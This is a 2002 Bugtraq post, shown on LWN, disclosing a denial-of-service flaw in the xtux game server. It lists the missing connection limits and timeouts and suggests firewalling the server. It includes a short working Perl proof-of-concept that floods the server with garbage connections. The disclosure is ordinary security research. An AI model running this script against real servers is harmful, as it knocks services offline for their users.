![[LWN Logo]](/images/lcorner.png) |
|
![[LWN.net]](/images/Included.png) |
From: "b0iler _" <b0iler@hotmail.com>
To: bugtraq@securityfocus.com
Subject: xtux server DoS.
Date: Sat, 09 Mar 2002 15:53:32 -0700
After telnetting into a xtux server a few times and typing random stuff I
noticed the sever stopped responding. Xtux is a really cool game for linux,
you should try it. It also took up 70% cpu before I killed it. Then coded
a small perl script to test this, worked everytime I tested. I emailed the
author of xtux a few days ago, haven't heard anything yet. I figure the
problems that need to be addressed are:
the number of connections from one host. - currently unlimitted.
the total number of connections. - currently unlimitted.
some sort of timeout for the server - currently the client handles timeouts
but server allows clients to stay connected without doing anything forever.
a fix for when users send garbage (don't make the connection correctly) to
the server and it becomes unresponcive.
For now I would just set tight firewall rules when you run the xtux server,
you should know who you are playing with anyways.
Here is that perl script I used to test:
#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponcive and takes up lots of CPU.
use IO::Socket;
for($n=0;$n<=3;$n++){ #you shouldn't even need all 3 connections.
print "Connecting to $ARGV[0] port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort =>
$ARGV[1], Proto => 'tcp' ) or print "\ncouldn't connect\n\n";
sleep 3;
print $sock "garbage data\n\n";
}
exit;
http://b0iler.advknowledge.net
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.